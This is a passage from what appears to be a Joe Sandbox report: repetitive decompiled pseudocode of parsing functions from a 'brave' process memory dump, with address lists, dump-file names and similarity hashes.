				if ( *_t127 != 0x18) goto 0xa6005d39;
				goto 0xa6005c22;
				goto 0xa6006051;
				_t128 = _t127 + 1;
				 *(__rbx + 0x18) = _t128;
				E00007FF67FF6A60089F0(__rbx);
				E00007FF67FF6A6004DD0();
				_a40 = _t128;
				_t154 = _t128;
				goto 0xa6005f58;
				r12d =  *(__rbx + 0x28);
				 *(__rbx + 0x18) =  &(_t154[1]);
				E00007FF67FF6A60089F0(__rbx);
				if ( *( *(__rbx + 0x18)) == 0x49) goto 0xa6006584;
				 *(__rbx + 0x18) = _t154;
				_t130 = _a40;
				 *(__rbx + 0x28) = r12d;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48));
				goto 0xa6005d30;
				_t162 = _a40;
				if (_t162 == 0) goto 0xa6005c20;
				_t91 =  *(__rbx + 0x38);
				if (_t91 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0xa6005c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t91 * 8)) = _t162;
				 *(__rbx + 0x38) = _t91 + 1;
				E00007FF67FF6A6004DD0();
				_a40 = _t130;
				 *((intOrPtr*)(__rbx + 0x4c)) = 1;
				 *(__rbx + 0x18) = _t162 + 3;
				E00007FF67FF6A6007F20(_t130, __rbx);
				_t155 = _t130;
				if (_t130 != 0) goto 0xa6006386;
				goto 0xa6005c20;
				asm("o16 nop [eax+eax]");
				_push(0xa62b53e0);
				_push(_t155);
				_push(__rbx);
				_t131 =  *(__rbx + 0x18);
				if (sil == 0) goto 0xa60066c8;
				 *(__rbx + 0x18) =  &(_t131[1]);
				r10d =  *_t131 & 0x000000ff;
				if (sil != 0) goto 0xa60066d0;
				r8d = 0x45;
				asm("o16 nop [eax+eax]");
				_t77 = (r8d >> 0x1f) + r8d >> 1;
				_t113 =  *((intOrPtr*)( *((intOrPtr*)(0xa62b4820 + (_t77 + _t77 * 2) * 8)))) - r10b;
				if (_t113 == 0) goto 0xa6006680;
				if (_t113 <= 0) goto 0xa60066c0;
				r8d = _t77;
				if (0 != r8d) goto 0xa6006648;
				return 0;
			}

0x7ff6a60063c0
0x7ff6a60063c6
0x7ff6a60063dd
0x7ff6a60063e1
0x7ff6a60063e9
0x7ff6a60063ec
0x7ff6a60063f2
0x7ff6a60063f6
0x7ff6a60063ff
0x7ff6a6006405
0x7ff6a600641c
0x7ff6a6006420
0x7ff6a6006428
0x7ff6a600642b
0x7ff6a6006431
0x7ff6a6006435
0x7ff6a600643e
0x7ff6a6006444
0x7ff6a600645b
0x7ff6a600645f
0x7ff6a6006467
0x7ff6a600646a
0x7ff6a6006470
0x7ff6a6006474
0x7ff6a6006480
0x7ff6a6006485
0x7ff6a6006493
0x7ff6a6006498
0x7ff6a60064a2
0x7ff6a60064a8
0x7ff6a60064bf
0x7ff6a60064c3
0x7ff6a60064cb
0x7ff6a60064ce
0x7ff6a60064d4
0x7ff6a60064d8
0x7ff6a60064dc
0x7ff6a60064eb
0x7ff6a60064f0
0x7ff6a60064f8
0x7ff6a6006501
0x7ff6a6006507
0x7ff6a6006512
0x7ff6a6006517
0x7ff6a600651e
0x7ff6a6006522
0x7ff6a6006537
0x7ff6a600653c
0x7ff6a6006541
0x7ff6a6006544
0x7ff6a6006550
0x7ff6a6006557
0x7ff6a600655e
0x7ff6a600656a
0x7ff6a600656c
0x7ff6a6006570
0x7ff6a6006575
0x7ff6a600657c
0x7ff6a600657f
0x7ff6a6006584
0x7ff6a600658c
0x7ff6a6006592
0x7ff6a6006598
0x7ff6a60065a8
0x7ff6a60065b2
0x7ff6a60065ba
0x7ff6a60065bf
0x7ff6a60065d0
0x7ff6a60065da
0x7ff6a60065de
0x7ff6a60065e6
0x7ff6a60065ec
0x7ff6a60065f2
0x7ff6a60065f7
0x7ff6a6006600
0x7ff6a6006601
0x7ff6a6006602
0x7ff6a6006607
0x7ff6a6006614
0x7ff6a600661e
0x7ff6a6006626
0x7ff6a600662d
0x7ff6a6006633
0x7ff6a6006642
0x7ff6a6006656
0x7ff6a6006666
0x7ff6a6006669
0x7ff6a600666b
0x7ff6a600666d
0x7ff6a6006673
0x7ff6a600667e

APIs

malloc.MSVCRT ref: 00007FF6A6032752

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 62a82320fdceb24766c0b0c8cff22094254bc4afba2bc82755b66d49ed25b182
Instruction ID: 5a7fb006565f5464ec8341c661fdd3a4a1da9fbf40bff63cda8a8ca69f7b3e32
Opcode Fuzzy Hash: 62a82320fdceb24766c0b0c8cff22094254bc4afba2bc82755b66d49ed25b182
Instruction Fuzzy Hash: 2531173260AB05C2E7208F08F99539A77A0FB94B8DF144625D2DC473A9CFBED194C784

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A60064A2 Relevance: 1.3, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00007FF67FF6A60064A2(void* __rbx, signed char* _a40) {
				signed int _t52;
				signed int _t56;
				signed int _t59;
				void* _t78;
				intOrPtr* _t83;
				signed char* _t84;
				signed char* _t86;
				signed char* _t87;
				signed char* _t105;
				signed char* _t106;
				long long _t112;

				_t56 =  *(__rbx + 0x28);
				if (_t56 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6032683;
				_t83 = (_t56 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t83 + 4)) = 0;
				 *(__rbx + 0x28) = _t56 + 1;
				 *_t83 = 0x27;
				 *((long long*)(_t83 + 0x10)) = 0xa62b53e0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				goto 0xa6005c22;
				E00007FF67FF6A6006EE0(_t83, __rbx);
				_a40 = _t83;
				if (_t83 == 0) goto 0xa6005c20;
				if ( *_t83 != 0x18) goto 0xa6005d39;
				goto 0xa6005c22;
				goto 0xa6006051;
				_t84 = _t83 + 1;
				 *(__rbx + 0x18) = _t84;
				E00007FF67FF6A60089F0(__rbx);
				E00007FF67FF6A6004DD0();
				_a40 = _t84;
				_t105 = _t84;
				goto 0xa6005f58;
				r12d =  *(__rbx + 0x28);
				 *(__rbx + 0x18) =  &(_t105[1]);
				E00007FF67FF6A60089F0(__rbx);
				if ( *( *(__rbx + 0x18)) == 0x49) goto 0xa6006584;
				 *(__rbx + 0x18) = _t105;
				_t86 = _a40;
				 *(__rbx + 0x28) = r12d;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48));
				goto 0xa6005d30;
				_t112 = _a40;
				if (_t112 == 0) goto 0xa6005c20;
				_t59 =  *(__rbx + 0x38);
				if (_t59 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0xa6005c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t59 * 8)) = _t112;
				 *(__rbx + 0x38) = _t59 + 1;
				E00007FF67FF6A6004DD0();
				_a40 = _t86;
				 *((intOrPtr*)(__rbx + 0x4c)) = 1;
				 *(__rbx + 0x18) = _t112 + 3;
				E00007FF67FF6A6007F20(_t86, __rbx);
				_t106 = _t86;
				if (_t86 != 0) goto 0xa6006386;
				goto 0xa6005c20;
				asm("o16 nop [eax+eax]");
				_push(0xa62b53e0);
				_push(_t106);
				_push(__rbx);
				_t87 =  *(__rbx + 0x18);
				if (sil == 0) goto 0xa60066c8;
				 *(__rbx + 0x18) =  &(_t87[1]);
				r10d =  *_t87 & 0x000000ff;
				if (sil != 0) goto 0xa60066d0;
				r8d = 0x45;
				asm("o16 nop [eax+eax]");
				_t52 = (r8d >> 0x1f) + r8d >> 1;
				_t78 =  *((intOrPtr*)( *((intOrPtr*)(0xa62b4820 + (_t52 + _t52 * 2) * 8)))) - r10b;
				if (_t78 == 0) goto 0xa6006680;
				if (_t78 <= 0) goto 0xa60066c0;
				r8d = _t52;
				if (0 != r8d) goto 0xa6006648;
				return 0;
			}

0x7ff6a60064a2
0x7ff6a60064a8
0x7ff6a60064bf
0x7ff6a60064c3
0x7ff6a60064cb
0x7ff6a60064ce
0x7ff6a60064d4
0x7ff6a60064d8
0x7ff6a60064dc
0x7ff6a60064eb
0x7ff6a60064f0
0x7ff6a60064f8
0x7ff6a6006501
0x7ff6a6006507
0x7ff6a6006512
0x7ff6a6006517
0x7ff6a600651e
0x7ff6a6006522
0x7ff6a6006537
0x7ff6a600653c
0x7ff6a6006541
0x7ff6a6006544
0x7ff6a6006550
0x7ff6a6006557
0x7ff6a600655e
0x7ff6a600656a
0x7ff6a600656c
0x7ff6a6006570
0x7ff6a6006575
0x7ff6a600657c
0x7ff6a600657f
0x7ff6a6006584
0x7ff6a600658c
0x7ff6a6006592
0x7ff6a6006598
0x7ff6a60065a8
0x7ff6a60065b2
0x7ff6a60065ba
0x7ff6a60065bf
0x7ff6a60065d0
0x7ff6a60065da
0x7ff6a60065de
0x7ff6a60065e6
0x7ff6a60065ec
0x7ff6a60065f2
0x7ff6a60065f7
0x7ff6a6006600
0x7ff6a6006601
0x7ff6a6006602
0x7ff6a6006607
0x7ff6a6006614
0x7ff6a600661e
0x7ff6a6006626
0x7ff6a600662d
0x7ff6a6006633
0x7ff6a6006642
0x7ff6a6006656
0x7ff6a6006666
0x7ff6a6006669
0x7ff6a600666b
0x7ff6a600666d
0x7ff6a6006673
0x7ff6a600667e

APIs

malloc.MSVCRT ref: 00007FF6A6032752

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: a086c596611ef4ea8cac5059dbacc38b62ed55accf5125814614d9dfe2806d9e
Instruction ID: 0085223e5367add0764167f6afa5be675b39a7470670b5faa05f643edeb3b11c
Opcode Fuzzy Hash: a086c596611ef4ea8cac5059dbacc38b62ed55accf5125814614d9dfe2806d9e
Instruction Fuzzy Hash: A531053260AB05C2E7208F08F9953A977A0FB94B89F254625D2DC473A9CFBED194C784

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A60062C7 Relevance: 1.3, APIs: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00007FF67FF6A60062C7(void* __eax, void* __ebx, void* __rbx, void* __rcx, void* __rdx, void* __r8, signed char* _a40) {
				signed int _t100;
				signed int _t111;
				signed int _t117;
				signed int _t119;
				signed int _t122;
				signed int _t124;
				signed int _t126;
				signed int _t129;
				signed int _t132;
				void* _t160;
				intOrPtr* _t165;
				intOrPtr* _t168;
				char* _t169;
				signed char* _t170;
				intOrPtr* _t173;
				intOrPtr* _t176;
				signed char* _t179;
				intOrPtr* _t182;
				signed char* _t183;
				signed char* _t185;
				signed char* _t186;
				intOrPtr* _t218;
				signed char* _t219;
				signed char* _t220;
				long long _t229;
				void* _t236;

				_t117 =  *(__rbx + 0x28);
				if (_t117 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa60326a9;
				_t165 = (_t117 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t165 + 4)) = 0;
				 *(__rbx + 0x28) = _t117 + 1;
				 *_t165 = 0x27;
				 *((long long*)(_t165 + 0x10)) = 0xa62b53c0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				_t119 =  *(__rbx + 0x28);
				if (_t119 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6032702;
				_t168 = (_t119 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t168 + 4)) = 0;
				 *(__rbx + 0x28) = _t119 + 1;
				 *_t168 = 0x27;
				 *((long long*)(_t168 + 0x10)) = 0xa62b5360;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0xa;
				goto 0xa6005c22;
				 *_t168 =  *_t168 + __eax;
				_t100 =  *(__rbx + 0x28);
				if (_t100 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6005c20;
				_t218 = (_t100 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t218 + 4)) = 0;
				 *(__rbx + 0x28) = _t100 + 1;
				 *_t218 = 0x42;
				 *((intOrPtr*)(_t218 + 0x10)) = E00007FF67FF6A6004E90(_t168, __rbx, __rdx, __r8, _t236);
				_t169 =  *(__rbx + 0x18);
				if ( *_t169 != 0x5f) goto 0xa6005c20;
				_t170 = _t169 + 1;
				 *(__rbx + 0x18) = _t170;
				E00007FF67FF6A6005BC0();
				E00007FF67FF6A6004DD0();
				_a40 = _t170;
				_t122 =  *(__rbx + 0x28);
				if (_t122 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6032670;
				_t173 = (_t122 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t173 + 4)) = 0;
				 *(__rbx + 0x28) = _t122 + 1;
				 *_t173 = 0x27;
				 *((long long*)(_t173 + 0x10)) = 0xa62b5340;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 9;
				_t124 =  *(__rbx + 0x28);
				if (_t124 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6032715;
				_t176 = (_t124 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t176 + 4)) = 0;
				 *(__rbx + 0x28) = _t124 + 1;
				 *_t176 = 0x27;
				 *((long long*)(_t176 + 0x10)) = 0xa62b5400;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0x11;
				_t126 =  *(__rbx + 0x28);
				if (_t126 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa60326ef;
				_t179 = (_t126 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t179 + 4)) = 0;
				 *(__rbx + 0x28) = _t126 + 1;
				 *_t179 = 0x27;
				 *((long long*)(_t179 + 0x10)) = 0xa62b53a0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 7;
				E00007FF67FF6A6005BC0();
				r9d = 0;
				E00007FF67FF6A6004DD0();
				_a40 = _t179;
				_t129 =  *(__rbx + 0x28);
				if (_t129 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6032683;
				_t182 = (_t129 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t182 + 4)) = 0;
				 *(__rbx + 0x28) = _t129 + 1;
				 *_t182 = 0x27;
				 *((long long*)(_t182 + 0x10)) = 0xa62b53e0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				goto 0xa6005c22;
				E00007FF67FF6A6006EE0(_t182, __rbx);
				_a40 = _t182;
				if (_t182 == 0) goto 0xa6005c20;
				if ( *_t182 != 0x18) goto 0xa6005d39;
				goto 0xa6005c22;
				goto 0xa6006051;
				_t183 = _t182 + 1;
				 *(__rbx + 0x18) = _t183;
				E00007FF67FF6A60089F0(__rbx);
				E00007FF67FF6A6004DD0();
				_a40 = _t183;
				_t219 = _t183;
				goto 0xa6005f58;
				r12d =  *(__rbx + 0x28);
				 *(__rbx + 0x18) =  &(_t219[1]);
				E00007FF67FF6A60089F0(__rbx);
				if ( *( *(__rbx + 0x18)) == 0x49) goto 0xa6006584;
				 *(__rbx + 0x18) = _t219;
				_t185 = _a40;
				 *(__rbx + 0x28) = r12d;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48));
				goto 0xa6005d30;
				_t229 = _a40;
				if (_t229 == 0) goto 0xa6005c20;
				_t132 =  *(__rbx + 0x38);
				if (_t132 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0xa6005c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t132 * 8)) = _t229;
				 *(__rbx + 0x38) = _t132 + 1;
				E00007FF67FF6A6004DD0();
				_a40 = _t185;
				 *((intOrPtr*)(__rbx + 0x4c)) = 1;
				 *(__rbx + 0x18) = _t229 + 3;
				E00007FF67FF6A6007F20(_t185, __rbx);
				_t220 = _t185;
				if (_t185 != 0) goto 0xa6006386;
				goto 0xa6005c20;
				asm("o16 nop [eax+eax]");
				_push(0xa62b53e0);
				_push(_t220);
				_push(__rbx);
				_t186 =  *(__rbx + 0x18);
				if (sil == 0) goto 0xa60066c8;
				 *(__rbx + 0x18) =  &(_t186[1]);
				r10d =  *_t186 & 0x000000ff;
				if (sil != 0) goto 0xa60066d0;
				r8d = 0x45;
				asm("o16 nop [eax+eax]");
				_t111 = (r8d >> 0x1f) + r8d >> 1;
				_t160 =  *((intOrPtr*)( *((intOrPtr*)(0xa62b4820 + (_t111 + _t111 * 2) * 8)))) - r10b;
				if (_t160 == 0) goto 0xa6006680;
				if (_t160 <= 0) goto 0xa60066c0;
				r8d = _t111;
				if (0 != r8d) goto 0xa6006648;
				return 0;
			}

0x7ff6a60062c7
0x7ff6a60062cd
0x7ff6a60062e4
0x7ff6a60062e8
0x7ff6a60062f0
0x7ff6a60062f3
0x7ff6a60062f9
0x7ff6a60062fd
0x7ff6a6006306
0x7ff6a600630c
0x7ff6a6006323
0x7ff6a6006327
0x7ff6a600632f
0x7ff6a6006332
0x7ff6a6006338
0x7ff6a600633c
0x7ff6a6006340
0x7ff6a600634e
0x7ff6a6006350
0x7ff6a6006356
0x7ff6a6006369
0x7ff6a600636d
0x7ff6a6006375
0x7ff6a6006378
0x7ff6a6006383
0x7ff6a6006386
0x7ff6a600638d
0x7ff6a6006393
0x7ff6a600639a
0x7ff6a600639e
0x7ff6a60063b1
0x7ff6a60063b6
0x7ff6a60063c0
0x7ff6a60063c6
0x7ff6a60063dd
0x7ff6a60063e1
0x7ff6a60063e9
0x7ff6a60063ec
0x7ff6a60063f2
0x7ff6a60063f6
0x7ff6a60063ff
0x7ff6a6006405
0x7ff6a600641c
0x7ff6a6006420
0x7ff6a6006428
0x7ff6a600642b
0x7ff6a6006431
0x7ff6a6006435
0x7ff6a600643e
0x7ff6a6006444
0x7ff6a600645b
0x7ff6a600645f
0x7ff6a6006467
0x7ff6a600646a
0x7ff6a6006470
0x7ff6a6006474
0x7ff6a6006480
0x7ff6a6006485
0x7ff6a6006493
0x7ff6a6006498
0x7ff6a60064a2
0x7ff6a60064a8
0x7ff6a60064bf
0x7ff6a60064c3
0x7ff6a60064cb
0x7ff6a60064ce
0x7ff6a60064d4
0x7ff6a60064d8
0x7ff6a60064dc
0x7ff6a60064eb
0x7ff6a60064f0
0x7ff6a60064f8
0x7ff6a6006501
0x7ff6a6006507
0x7ff6a6006512
0x7ff6a6006517
0x7ff6a600651e
0x7ff6a6006522
0x7ff6a6006537
0x7ff6a600653c
0x7ff6a6006541
0x7ff6a6006544
0x7ff6a6006550
0x7ff6a6006557
0x7ff6a600655e
0x7ff6a600656a
0x7ff6a600656c
0x7ff6a6006570
0x7ff6a6006575
0x7ff6a600657c
0x7ff6a600657f
0x7ff6a6006584
0x7ff6a600658c
0x7ff6a6006592
0x7ff6a6006598
0x7ff6a60065a8
0x7ff6a60065b2
0x7ff6a60065ba
0x7ff6a60065bf
0x7ff6a60065d0
0x7ff6a60065da
0x7ff6a60065de
0x7ff6a60065e6
0x7ff6a60065ec
0x7ff6a60065f2
0x7ff6a60065f7
0x7ff6a6006600
0x7ff6a6006601
0x7ff6a6006602
0x7ff6a6006607
0x7ff6a6006614
0x7ff6a600661e
0x7ff6a6006626
0x7ff6a600662d
0x7ff6a6006633
0x7ff6a6006642
0x7ff6a6006656
0x7ff6a6006666
0x7ff6a6006669
0x7ff6a600666b
0x7ff6a600666d
0x7ff6a6006673
0x7ff6a600667e

APIs

malloc.MSVCRT ref: 00007FF6A6032752

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 0fe0bb664fee0acb066360bbf1dd7b13264afc6f109f4210fc352504dfbd1cf1
Instruction ID: 378fc917be6b4631ca7fdc2482200a4706b5d56594a2b580e1ad106b98661486
Opcode Fuzzy Hash: 0fe0bb664fee0acb066360bbf1dd7b13264afc6f109f4210fc352504dfbd1cf1
Instruction Fuzzy Hash: 1B21387260AB05C2E7208F04F9853A977B0FB94B49F258625D2CC473A9CFBED194C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6006249 Relevance: 1.3, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00007FF67FF6A6006249(void* __eax, void* __ebx, void* __rbx, void* __rcx, void* __rdx, void* __r8, signed char* _a40) {
				signed int _t116;
				signed int _t127;
				signed int _t133;
				signed int _t135;
				signed int _t137;
				signed int _t139;
				signed int _t142;
				signed int _t144;
				signed int _t146;
				signed int _t149;
				signed int _t152;
				void* _t182;
				intOrPtr* _t187;
				intOrPtr* _t190;
				intOrPtr* _t193;
				intOrPtr* _t196;
				char* _t197;
				signed char* _t198;
				intOrPtr* _t201;
				intOrPtr* _t204;
				signed char* _t207;
				intOrPtr* _t210;
				signed char* _t211;
				signed char* _t213;
				signed char* _t214;
				intOrPtr* _t248;
				signed char* _t249;
				signed char* _t250;
				long long _t259;
				void* _t266;

				_t133 =  *(__rbx + 0x28);
				if (_t133 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa60326c9;
				_t187 = (_t133 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t187 + 4)) = 0;
				 *(__rbx + 0x28) = _t133 + 1;
				 *_t187 = 0x27;
				 *((long long*)(_t187 + 0x10)) = 0xa62b5380;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 4;
				_t135 =  *(__rbx + 0x28);
				if (_t135 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa60326dc;
				_t190 = (_t135 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t190 + 4)) = 0;
				 *(__rbx + 0x28) = _t135 + 1;
				 *_t190 = 0x27;
				 *((long long*)(_t190 + 0x10)) = 0xa62b5320;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 9;
				_t137 =  *(__rbx + 0x28);
				if (_t137 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa60326a9;
				_t193 = (_t137 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t193 + 4)) = 0;
				 *(__rbx + 0x28) = _t137 + 1;
				 *_t193 = 0x27;
				 *((long long*)(_t193 + 0x10)) = 0xa62b53c0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				_t139 =  *(__rbx + 0x28);
				if (_t139 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6032702;
				_t196 = (_t139 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t196 + 4)) = 0;
				 *(__rbx + 0x28) = _t139 + 1;
				 *_t196 = 0x27;
				 *((long long*)(_t196 + 0x10)) = 0xa62b5360;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0xa;
				goto 0xa6005c22;
				 *_t196 =  *_t196 + __eax;
				_t116 =  *(__rbx + 0x28);
				if (_t116 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6005c20;
				_t248 = (_t116 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t248 + 4)) = 0;
				 *(__rbx + 0x28) = _t116 + 1;
				 *_t248 = 0x42;
				 *((intOrPtr*)(_t248 + 0x10)) = E00007FF67FF6A6004E90(_t196, __rbx, __rdx, __r8, _t266);
				_t197 =  *(__rbx + 0x18);
				if ( *_t197 != 0x5f) goto 0xa6005c20;
				_t198 = _t197 + 1;
				 *(__rbx + 0x18) = _t198;
				E00007FF67FF6A6005BC0();
				E00007FF67FF6A6004DD0();
				_a40 = _t198;
				_t142 =  *(__rbx + 0x28);
				if (_t142 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6032670;
				_t201 = (_t142 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t201 + 4)) = 0;
				 *(__rbx + 0x28) = _t142 + 1;
				 *_t201 = 0x27;
				 *((long long*)(_t201 + 0x10)) = 0xa62b5340;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 9;
				_t144 =  *(__rbx + 0x28);
				if (_t144 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6032715;
				_t204 = (_t144 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t204 + 4)) = 0;
				 *(__rbx + 0x28) = _t144 + 1;
				 *_t204 = 0x27;
				 *((long long*)(_t204 + 0x10)) = 0xa62b5400;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0x11;
				_t146 =  *(__rbx + 0x28);
				if (_t146 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa60326ef;
				_t207 = (_t146 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t207 + 4)) = 0;
				 *(__rbx + 0x28) = _t146 + 1;
				 *_t207 = 0x27;
				 *((long long*)(_t207 + 0x10)) = 0xa62b53a0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 7;
				E00007FF67FF6A6005BC0();
				r9d = 0;
				E00007FF67FF6A6004DD0();
				_a40 = _t207;
				_t149 =  *(__rbx + 0x28);
				if (_t149 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0xa6032683;
				_t210 = (_t149 << 5) +  *((intOrPtr*)(__rbx + 0x20));
